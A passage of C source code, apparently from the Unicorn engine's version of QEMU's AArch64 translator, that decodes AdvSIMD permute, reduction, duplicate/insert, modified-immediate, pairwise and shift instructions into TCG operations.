bit 2 indicates 1 vs 2 variant of the insn. */ int opcode = extract32(insn, 12, 2); bool part = extract32(insn, 14, 1); bool is_q = extract32(insn, 30, 1); int esize = 8 << size; int i, ofs; int datasize = is_q ? 128 : 64; int elements = datasize / esize; TCGv_i64 tcg_res, tcg_resl, tcg_resh; if (opcode == 0 || (size == 3 && !is_q)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_resl = tcg_const_i64(tcg_ctx, 0); tcg_resh = tcg_const_i64(tcg_ctx, 0); tcg_res = tcg_temp_new_i64(tcg_ctx); for (i = 0; i < elements; i++) { switch (opcode) { case 1: /* UZP1/2 */ { int midpoint = elements / 2; if (i < midpoint) { read_vec_element(s, tcg_res, rn, 2 * i + part, size); } else { read_vec_element(s, tcg_res, rm, 2 * (i - midpoint) + part, size); } break; } case 2: /* TRN1/2 */ if (i & 1) { read_vec_element(s, tcg_res, rm, (i & ~1) + part, size); } else { read_vec_element(s, tcg_res, rn, (i & ~1) + part, size); } break; case 3: /* ZIP1/2 */ { int base = part * elements / 2; if (i & 1) { read_vec_element(s, tcg_res, rm, base + (i >> 1), size); } else { read_vec_element(s, tcg_res, rn, base + (i >> 1), size); } break; } default: g_assert_not_reached(); } ofs = i * esize; if (ofs < 64) { tcg_gen_shli_i64(tcg_ctx, tcg_res, tcg_res, ofs); tcg_gen_or_i64(tcg_ctx, tcg_resl, tcg_resl, tcg_res); } else { tcg_gen_shli_i64(tcg_ctx, tcg_res, tcg_res, ofs - 64); tcg_gen_or_i64(tcg_ctx, tcg_resh, tcg_resh, tcg_res); } } tcg_temp_free_i64(tcg_ctx, tcg_res); write_vec_element(s, tcg_resl, rd, 0, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resl); write_vec_element(s, tcg_resh, rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resh); clear_vec_high(s, true, rd); } /* * do_reduction_op helper * * This mirrors the Reduce() pseudocode in the ARM ARM. It is * important for correct NaN propagation that we do these * operations in exactly the order specified by the pseudocode. * * This is a recursive function, TCG temps should be freed by the * calling function once it is done with the values. */ static TCGv_i32 do_reduction_op(DisasContext *s, int fpopcode, int rn, int esize, int size, int vmap, TCGv_ptr fpst) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (esize == size) { int element; MemOp msize = esize == 16 ? MO_16 : MO_32; TCGv_i32 tcg_elem; /* We should have one register left here */ assert(ctpop8(vmap) == 1); element = ctz32(vmap); assert(element < 8); tcg_elem = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_elem, rn, element, msize); return tcg_elem; } else { int bits = size / 2; int shift = ctpop8(vmap) / 2; int vmap_lo = (vmap >> shift) & vmap; int vmap_hi = (vmap & ~vmap_lo); TCGv_i32 tcg_hi, tcg_lo, tcg_res; tcg_hi = do_reduction_op(s, fpopcode, rn, esize, bits, vmap_hi, fpst); tcg_lo = do_reduction_op(s, fpopcode, rn, esize, bits, vmap_lo, fpst); tcg_res = tcg_temp_new_i32(tcg_ctx); switch (fpopcode) { case 0x0c: /* fmaxnmv half-precision */ gen_helper_advsimd_maxnumh(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x0f: /* fmaxv half-precision */ gen_helper_advsimd_maxh(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x1c: /* fminnmv half-precision */ gen_helper_advsimd_minnumh(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x1f: /* fminv half-precision */ gen_helper_advsimd_minh(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x2c: /* fmaxnmv */ gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x2f: /* fmaxv */ gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x3c: /* fminnmv */ gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x3f: /* fminv */ gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, tcg_hi); tcg_temp_free_i32(tcg_ctx, tcg_lo); return tcg_res; } } /* AdvSIMD across lanes * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 * +---+---+---+-----------+------+-----------+--------+-----+------+------+ * | 0 | Q | U | 0 1 1 1 0 | size | 1 1 0 0 0 | opcode | 1 0 | Rn | Rd | * +---+---+---+-----------+------+-----------+--------+-----+------+------+ */ static void disas_simd_across_lanes(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 5); bool is_q = extract32(insn, 30, 1); bool is_u = extract32(insn, 29, 1); bool is_fp = false; bool is_min = false; int esize; int elements; int i; TCGv_i64 tcg_res, tcg_elt; switch (opcode) { case 0x1b: /* ADDV */ if (is_u) { unallocated_encoding(s); return; } /* fall through */ case 0x3: /* SADDLV, UADDLV */ case 0xa: /* SMAXV, UMAXV */ case 0x1a: /* SMINV, UMINV */ if (size == 3 || (size == 2 && !is_q)) { unallocated_encoding(s); return; } break; case 0xc: /* FMAXNMV, FMINNMV */ case 0xf: /* FMAXV, FMINV */ /* Bit 1 of size field encodes min vs max and the actual size * depends on the encoding of the U bit. If not set (and FP16 * enabled) then we do half-precision float instead of single * precision. */ is_min = extract32(size, 1, 1); is_fp = true; if (!is_u && dc_isar_feature(aa64_fp16, s)) { size = 1; } else if (!is_u || !is_q || extract32(size, 0, 1)) { unallocated_encoding(s); return; } else { size = 2; } break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } esize = 8 << size; elements = (is_q ? 128 : 64) / esize; tcg_res = tcg_temp_new_i64(tcg_ctx); tcg_elt = tcg_temp_new_i64(tcg_ctx); /* These instructions operate across all lanes of a vector * to produce a single result. We can guarantee that a 64 * bit intermediate is sufficient: * + for [US]ADDLV the maximum element size is 32 bits, and * the result type is 64 bits * + for FMAX*V, FMIN*V, ADDV the intermediate type is the * same as the element size, which is 32 bits at most * For the integer operations we can choose to work at 64 * or 32 bits and truncate at the end; for simplicity * we use 64 bits always. The floating point * ops do require 32 bit intermediates, though. */ if (!is_fp) { read_vec_element(s, tcg_res, rn, 0, size | (is_u ? 0 : MO_SIGN)); for (i = 1; i < elements; i++) { read_vec_element(s, tcg_elt, rn, i, size | (is_u ? 0 : MO_SIGN)); switch (opcode) { case 0x03: /* SADDLV / UADDLV */ case 0x1b: /* ADDV */ tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); break; case 0x0a: /* SMAXV / UMAXV */ if (is_u) { tcg_gen_umax_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); } else { tcg_gen_smax_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); } break; case 0x1a: /* SMINV / UMINV */ if (is_u) { tcg_gen_umin_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); } else { tcg_gen_smin_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); } break; default: g_assert_not_reached(); } } } else { /* Floating point vector reduction ops which work across 32 * bit (single) or 16 bit (half-precision) intermediates. * Note that correct NaN propagation requires that we do these * operations in exactly the order specified by the pseudocode. */ TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, size == MO_16); int fpopcode = opcode | is_min << 4 | is_u << 5; int vmap = (1 << elements) - 1; TCGv_i32 tcg_res32 = do_reduction_op(s, fpopcode, rn, esize, (is_q ? 128 : 64), vmap, fpst); tcg_gen_extu_i32_i64(tcg_ctx, tcg_res, tcg_res32); tcg_temp_free_i32(tcg_ctx, tcg_res32); tcg_temp_free_ptr(tcg_ctx, fpst); } tcg_temp_free_i64(tcg_ctx, tcg_elt); /* Now truncate the result to the width required for the final output */ if (opcode == 0x03) { /* SADDLV, UADDLV: result is 2*esize */ size++; } switch (size) { case 0: tcg_gen_ext8u_i64(tcg_ctx, tcg_res, tcg_res); break; case 1: tcg_gen_ext16u_i64(tcg_ctx, tcg_res, tcg_res); break; case 2: tcg_gen_ext32u_i64(tcg_ctx, tcg_res, tcg_res); break; case 3: break; default: g_assert_not_reached(); } write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_res); } /* DUP (Element, Vector) * * 31 30 29 21 20 16 15 10 9 5 4 0 * +---+---+-------------------+--------+-------------+------+------+ * | 0 | Q | 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 0 0 0 1 | Rn | Rd | * +---+---+-------------------+--------+-------------+------+------+ * * size: encoded in imm5 (see ARM ARM LowestSetBit()) */ static void handle_simd_dupe(DisasContext *s, int is_q, int rd, int rn, int imm5) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = ctz32(imm5); int index; if (size > 3 || (size == 3 && !is_q)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } index = imm5 >> (size + 1); tcg_gen_gvec_dup_mem(tcg_ctx, size, vec_full_reg_offset(s, rd), vec_reg_offset(s, rn, index, size), is_q ? 16 : 8, vec_full_reg_size(s)); } /* DUP (element, scalar) * 31 21 20 16 15 10 9 5 4 0 * +-----------------------+--------+-------------+------+------+ * | 0 1 0 1 1 1 1 0 0 0 0 | imm5 | 0 0 0 0 0 1 | Rn | Rd | * +-----------------------+--------+-------------+------+------+ */ static void handle_simd_dupes(DisasContext *s, int rd, int rn, int imm5) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = ctz32(imm5); int index; TCGv_i64 tmp; if (size > 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } index = imm5 >> (size + 1); /* This instruction just extracts the specified element and * zero-extends it into the bottom of the destination register. */ tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tmp, rn, index, size); write_fp_dreg(s, rd, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } /* DUP (General) * * 31 30 29 21 20 16 15 10 9 5 4 0 * +---+---+-------------------+--------+-------------+------+------+ * | 0 | Q | 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 0 0 1 1 | Rn | Rd | * +---+---+-------------------+--------+-------------+------+------+ * * size: encoded in imm5 (see ARM ARM LowestSetBit()) */ static void handle_simd_dupg(DisasContext *s, int is_q, int rd, int rn, int imm5) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = ctz32(imm5); uint32_t dofs, oprsz, maxsz; if (size > 3 || ((size == 3) && !is_q)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } dofs = vec_full_reg_offset(s, rd); oprsz = is_q ? 16 : 8; maxsz = vec_full_reg_size(s); tcg_gen_gvec_dup_i64(tcg_ctx, size, dofs, oprsz, maxsz, cpu_reg(s, rn)); } /* INS (Element) * * 31 21 20 16 15 14 11 10 9 5 4 0 * +-----------------------+--------+------------+---+------+------+ * | 0 1 1 0 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 | Rn | Rd | * +-----------------------+--------+------------+---+------+------+ * * size: encoded in imm5 (see ARM ARM LowestSetBit()) * index: encoded in imm5<4:size+1> */ static void handle_simd_inse(DisasContext *s, int rd, int rn, int imm4, int imm5) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = ctz32(imm5); int src_index, dst_index; TCGv_i64 tmp; if (size > 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } dst_index = extract32(imm5, 1+size, 5); src_index = extract32(imm4, size, 4); tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tmp, rn, src_index, size); write_vec_element(s, tmp, rd, dst_index, size); tcg_temp_free_i64(tcg_ctx, tmp); /* INS is considered a 128-bit write for SVE. */ clear_vec_high(s, true, rd); } /* INS (General) * * 31 21 20 16 15 10 9 5 4 0 * +-----------------------+--------+-------------+------+------+ * | 0 1 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 0 1 1 1 | Rn | Rd | * +-----------------------+--------+-------------+------+------+ * * size: encoded in imm5 (see ARM ARM LowestSetBit()) * index: encoded in imm5<4:size+1> */ static void handle_simd_insg(DisasContext *s, int rd, int rn, int imm5) { int size = ctz32(imm5); int idx; if (size > 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } idx = extract32(imm5, 1 + size, 4 - size); write_vec_element(s, cpu_reg(s, rn), rd, idx, size); /* INS is considered a 128-bit write for SVE. */ clear_vec_high(s, true, rd); } /* * UMOV (General) * SMOV (General) * * 31 30 29 21 20 16 15 12 10 9 5 4 0 * +---+---+-------------------+--------+-------------+------+------+ * | 0 | Q | 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 1 U 1 1 | Rn | Rd | * +---+---+-------------------+--------+-------------+------+------+ * * U: unsigned when set * size: encoded in imm5 (see ARM ARM LowestSetBit()) */ static void handle_simd_umov_smov(DisasContext *s, int is_q, int is_signed, int rn, int rd, int imm5) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = ctz32(imm5); int element; TCGv_i64 tcg_rd; /* Check for UnallocatedEncodings */ if (is_signed) { if (size > 2 || (size == 2 && !is_q)) { unallocated_encoding(s); return; } } else { if (size > 3 || (size < 3 && is_q) || (size == 3 && !is_q)) { unallocated_encoding(s); return; } } if (!fp_access_check(s)) { return; } element = extract32(imm5, 1+size, 4); tcg_rd = cpu_reg(s, rd); read_vec_element(s, tcg_rd, rn, element, size | (is_signed ? MO_SIGN : 0)); if (is_signed && !is_q) { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } } /* AdvSIMD copy * 31 30 29 28 21 20 16 15 14 11 10 9 5 4 0 * +---+---+----+-----------------+------+---+------+---+------+------+ * | 0 | Q | op | 0 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 | Rn | Rd | * +---+---+----+-----------------+------+---+------+---+------+------+ */ static void disas_simd_copy(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int imm4 = extract32(insn, 11, 4); int op = extract32(insn, 29, 1); int is_q = extract32(insn, 30, 1); int imm5 = extract32(insn, 16, 5); if (op) { if (is_q) { /* INS (element) */ handle_simd_inse(s, rd, rn, imm4, imm5); } else { unallocated_encoding(s); } } else { switch (imm4) { case 0: /* DUP (element - vector) */ handle_simd_dupe(s, is_q, rd, rn, imm5); break; case 1: /* DUP (general) */ handle_simd_dupg(s, is_q, rd, rn, imm5); break; case 3: if (is_q) { /* INS (general) */ handle_simd_insg(s, rd, rn, imm5); } else { unallocated_encoding(s); } break; case 5: case 7: /* UMOV/SMOV (is_q indicates 32/64; imm4 indicates signedness) */ handle_simd_umov_smov(s, is_q, (imm4 == 5), rn, rd, imm5); break; default: unallocated_encoding(s); break; } } } /* AdvSIMD modified immediate * 31 30 29 28 19 18 16 15 12 11 10 9 5 4 0 * +---+---+----+---------------------+-----+-------+----+---+-------+------+ * | 0 | Q | op | 0 1 1 1 1 0 0 0 0 0 | abc | cmode | o2 | 1 | defgh | Rd | * +---+---+----+---------------------+-----+-------+----+---+-------+------+ * * There are a number of operations that can be carried out here: * MOVI - move (shifted) imm into register * MVNI - move inverted (shifted) imm into register * ORR - bitwise OR of (shifted) imm with register * BIC - bitwise clear of (shifted) imm with register * With ARMv8.2 we also have: * FMOV half-precision */ static void disas_simd_mod_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int cmode = extract32(insn, 12, 4); int cmode_3_1 = extract32(cmode, 1, 3); int cmode_0 = extract32(cmode, 0, 1); int o2 = extract32(insn, 11, 1); uint64_t abcdefgh = extract32(insn, 5, 5) | (extract32(insn, 16, 3) << 5); bool is_neg = extract32(insn, 29, 1); bool is_q = extract32(insn, 30, 1); uint64_t imm = 0; if (o2 != 0 || ((cmode == 0xf) && is_neg && !is_q)) { /* Check for FMOV (vector, immediate) - half-precision */ if (!(dc_isar_feature(aa64_fp16, s) && o2 && cmode == 0xf)) { unallocated_encoding(s); return; } } if (!fp_access_check(s)) { return; } /* See AdvSIMDExpandImm() in ARM ARM */ switch (cmode_3_1) { case 0: /* Replicate(Zeros(24):imm8, 2) */ case 1: /* Replicate(Zeros(16):imm8:Zeros(8), 2) */ case 2: /* Replicate(Zeros(8):imm8:Zeros(16), 2) */ case 3: /* Replicate(imm8:Zeros(24), 2) */ { int shift = cmode_3_1 * 8; imm = bitfield_replicate(abcdefgh << shift, 32); break; } case 4: /* Replicate(Zeros(8):imm8, 4) */ case 5: /* Replicate(imm8:Zeros(8), 4) */ { int shift = (cmode_3_1 & 0x1) * 8; imm = bitfield_replicate(abcdefgh << shift, 16); break; } case 6: if (cmode_0) { /* Replicate(Zeros(8):imm8:Ones(16), 2) */ imm = (abcdefgh << 16) | 0xffff; } else { /* Replicate(Zeros(16):imm8:Ones(8), 2) */ imm = (abcdefgh << 8) | 0xff; } imm = bitfield_replicate(imm, 32); break; case 7: if (!cmode_0 && !is_neg) { imm = bitfield_replicate(abcdefgh, 8); } else if (!cmode_0 && is_neg) { int i; imm = 0; for (i = 0; i < 8; i++) { if ((abcdefgh) & (1ULL << i)) { imm |= 0xffULL << (i * 8); } } } else if (cmode_0) { if (is_neg) { imm = (abcdefgh & 0x3f) << 48; if (abcdefgh & 0x80) { imm |= 0x8000000000000000ULL; } if (abcdefgh & 0x40) { imm |= 0x3fc0000000000000ULL; } else { imm |= 0x4000000000000000ULL; } } else { if (o2) { /* FMOV (vector, immediate) - half-precision */ imm = vfp_expand_imm(MO_16, abcdefgh); /* now duplicate across the lanes */ imm = bitfield_replicate(imm, 16); } else { imm = (abcdefgh & 0x3f) << 19; if (abcdefgh & 0x80) { imm |= 0x80000000; } if (abcdefgh & 0x40) { imm |= 0x3e000000; } else { imm |= 0x40000000; } imm |= (imm << 32); } } } break; default: fprintf(stderr, "%s: cmode_3_1: %x\n", __func__, cmode_3_1); g_assert_not_reached(); } if (cmode_3_1 != 7 && is_neg) { imm = ~imm; } if (!((cmode & 0x9) == 0x1 || (cmode & 0xd) == 0x9)) { /* MOVI or MVNI, with MVNI negation handled above. */ tcg_gen_gvec_dup64i(tcg_ctx, vec_full_reg_offset(s, rd), is_q ? 16 : 8, vec_full_reg_size(s), imm); } else { /* ORR or BIC, with BIC negation to AND handled above. */ if (is_neg) { gen_gvec_fn2i(s, is_q, rd, rd, imm, tcg_gen_gvec_andi, MO_64); } else { gen_gvec_fn2i(s, is_q, rd, rd, imm, tcg_gen_gvec_ori, MO_64); } } } /* AdvSIMD scalar copy * 31 30 29 28 21 20 16 15 14 11 10 9 5 4 0 * +-----+----+-----------------+------+---+------+---+------+------+ * | 0 1 | op | 1 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 | Rn | Rd | * +-----+----+-----------------+------+---+------+---+------+------+ */ static void disas_simd_scalar_copy(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int imm4 = extract32(insn, 11, 4); int imm5 = extract32(insn, 16, 5); int op = extract32(insn, 29, 1); if (op != 0 || imm4 != 0) { unallocated_encoding(s); return; } /* DUP (element, scalar) */ handle_simd_dupes(s, rd, rn, imm5); } /* AdvSIMD scalar pairwise * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 * +-----+---+-----------+------+-----------+--------+-----+------+------+ * | 0 1 | U | 1 1 1 1 0 | size | 1 1 0 0 0 | opcode | 1 0 | Rn | Rd | * +-----+---+-----------+------+-----------+--------+-----+------+------+ */ static void disas_simd_scalar_pairwise(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); TCGv_ptr fpst; /* For some ops (the FP ones), size[1] is part of the encoding. * For ADDP strictly it is not but size[1] is always 1 for valid * encodings. */ opcode |= (extract32(size, 1, 1) << 5); switch (opcode) { case 0x3b: /* ADDP */ if (u || size != 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } fpst = NULL; break; case 0xc: /* FMAXNMP */ case 0xd: /* FADDP */ case 0xf: /* FMAXP */ case 0x2c: /* FMINNMP */ case 0x2f: /* FMINP */ /* FP op, size[0] is 32 or 64 bit*/ if (!u) { if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } else { size = MO_16; } } else { size = extract32(size, 0, 1) ? MO_64 : MO_32; } if (!fp_access_check(s)) { return; } fpst = get_fpstatus_ptr(tcg_ctx, size == MO_16); break; default: unallocated_encoding(s); return; } if (size == MO_64) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op1, rn, 0, MO_64); read_vec_element(s, tcg_op2, rn, 1, MO_64); switch (opcode) { case 0x3b: /* ADDP */ tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_op1, tcg_op2); break; case 0xc: /* FMAXNMP */ gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xd: /* FADDP */ gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xf: /* FMAXP */ gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2c: /* FMINNMP */ gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2f: /* FMINP */ gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res); } else { TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op1, rn, 0, size); read_vec_element_i32(s, tcg_op2, rn, 1, size); if (size == MO_16) { switch (opcode) { case 0xc: /* FMAXNMP */ gen_helper_advsimd_maxnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xd: /* FADDP */ gen_helper_advsimd_addh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xf: /* FMAXP */ gen_helper_advsimd_maxh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2c: /* FMINNMP */ gen_helper_advsimd_minnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2f: /* FMINP */ gen_helper_advsimd_minh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } } else { switch (opcode) { case 0xc: /* FMAXNMP */ gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xd: /* FADDP */ gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xf: /* FMAXP */ gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2c: /* FMINNMP */ gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2f: /* FMINP */ gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } } write_fp_sreg(s, rd, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_res); } if (fpst) { tcg_temp_free_ptr(tcg_ctx, fpst); } } /* * Common SSHR[RA]/USHR[RA] - Shift right (optional rounding/accumulate) * * This code is handles the common shifting code and is used by both * the vector and scalar code. */ static void handle_shri_with_rndacc(TCGContext *tcg_ctx, TCGv_i64 tcg_res, TCGv_i64 tcg_src, TCGv_i64 tcg_rnd, bool accumulate, bool is_u, int size, int shift) { bool extended_result = false; bool round = tcg_rnd != NULL; int ext_lshift = 0; TCGv_i64 tcg_src_hi; if (round && size == 3) { extended_result = true; ext_lshift = 64 - shift; tcg_src_hi = tcg_temp_new_i64(tcg_ctx); } else if (shift == 64) { if (!accumulate && is_u) { /* result is zero */ tcg_gen_movi_i64(tcg_ctx, tcg_res, 0); return; } } /* Deal with the rounding step */ if (round) { if (extended_result) { TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); if (!is_u) { /* take care of sign extending tcg_res */ tcg_gen_sari_i64(tcg_ctx, tcg_src_hi, tcg_src, 63); tcg_gen_add2_i64(tcg_ctx, tcg_src, tcg_src_hi, tcg_src, tcg_src_hi, tcg_rnd, tcg_zero); } else { tcg_gen_add2_i64(tcg_ctx, tcg_src, tcg_src_hi, tcg_src, tcg_zero, tcg_rnd, tcg_zero); } tcg_temp_free_i64(tcg_ctx, tcg_zero); } else { tcg_gen_add_i64(tcg_ctx, tcg_src, tcg_src, tcg_rnd); } } /* Now do the shift right */ if (round && extended_result) { /* extended case, >64 bit precision required */ if (ext_lshift == 0) { /* special case, only high bits matter */ tcg_gen_mov_i64(tcg_ctx, tcg_src, tcg_src_hi); } else { tcg_gen_shri_i64(tcg_ctx, tcg_src, tcg_src, shift); tcg_gen_shli_i64(tcg_ctx, tcg_src_hi, tcg_src_hi, ext_lshift); tcg_gen_or_i64(tcg_ctx, tcg_src, tcg_src, tcg_src_hi); } } else { if (is_u) { if (shift == 64) { /* essentially shifting in 64 zeros */ tcg_gen_movi_i64(tcg_ctx, tcg_src, 0); } else { tcg_gen_shri_i64(tcg_ctx, tcg_src, tcg_src, shift); } } else { if (shift == 64) { /* effectively extending the sign-bit */ tcg_gen_sari_i64(tcg_ctx, tcg_src, tcg_src, 63); } else { tcg_gen_sari_i64(tcg_ctx, tcg_src, tcg_src, shift); } } } if (accumulate) { tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_res, tcg_src); } else { tcg_gen_mov_i64(tcg_ctx, tcg_res, tcg_src); } if (extended_result) { tcg_temp_free_i64(tcg_ctx, tcg_src_hi); } } /* SSHR[RA]/USHR[RA] - Scalar shift right (optional rounding/accumulate) */ static void handle_scalar_simd_shri(DisasContext *s, bool is_u, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int size = 3; int immhb = immh << 3 | immb; int shift = 2 * (8 << size) - immhb; bool accumulate = false; bool round = false; bool insert = false; TCGv_i64 tcg_rn; TCGv_i64 tcg_rd; TCGv_i64 tcg_round; if (!extract32(immh, 3, 1)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } switch (opcode) { case 0x02: /* SSRA / USRA (accumulate) */ accumulate = true; break; case 0x04: /* SRSHR / URSHR (rounding) */ round = true; break; case 0x06: /* SRSRA / URSRA (accum + rounding) */ accumulate = round = true; break; case 0x08: /* SRI */ insert = true; break; } if (round) { uint64_t round_const = 1ULL << (shift - 1); tcg_round = tcg_const_i64(tcg_ctx, round_const); } else { tcg_round = NULL; } tcg_rn = read_fp_dreg(s, rn); tcg_rd = (accumulate || insert) ? read_fp_dreg(s, rd) : tcg_temp_new_i64(tcg_ctx); if (insert) { /* shift count same as element size is valid but does nothing; * special case to avoid potential shift by 64. */ int esize = 8 << size; if (shift != esize) { tcg_gen_shri_i64(tcg_ctx, tcg_rn, tcg_rn, shift); tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_rn, 0, esize - shift); } } else { handle_shri_with_rndacc(tcg_ctx, tcg_rd, tcg_rn, tcg_round, accumulate, is_u, size, shift); } write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); tcg_temp_free_i64(tcg_ctx, tcg_rd); if (round) { tcg_temp_free_i64(tcg_ctx, tcg_round); } } /* SHL/SLI - Scalar shift left */ static void handle_scalar_simd_shli(DisasContext *s, bool insert, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = 32 - clz32(immh) - 1; int immhb = immh << 3 | immb; int shift = immhb - (8 << size); TCGv_i64 tcg_rn = new_tmp_a64(s); TCGv_i64 tcg_rd = new_tmp_a64(s); if (!extract32(immh, 3, 1)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rn = read_fp_dreg(s, rn); tcg_rd = insert ? read_fp_dreg(s, rd) : tcg_temp_new_i64(tcg_ctx); if (insert) { tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_rn, shift, 64 - shift); } else { tcg_gen_shli_i64(tcg_ctx, tcg_rd, tcg_rn, shift); } write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); tcg_temp_free_i64(tcg_ctx, tcg_rd); } /* SQSHRN/SQSHRUN - Saturating (signed/unsigned) shift right with * (signed/unsigned) narrowing */ static void handle_vec_simd_sqshrn(DisasContext *s, bool is_scalar, bool is_q, bool is_u_shift, bool is_u_narrow, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int immhb = immh << 3 | immb; int size = 32 - clz32(immh) - 1; int esize = 8 << size; int shift = (2 * esize) - immhb; int elements = is_scalar ? 1 : (64 / esize); bool round = extract32(opcode, 0, 1); MemOp ldop = (size + 1) | (is_u_shift ? 0 : MO_SIGN); TCGv_i64 tcg_rn, tcg_rd, tcg_round; 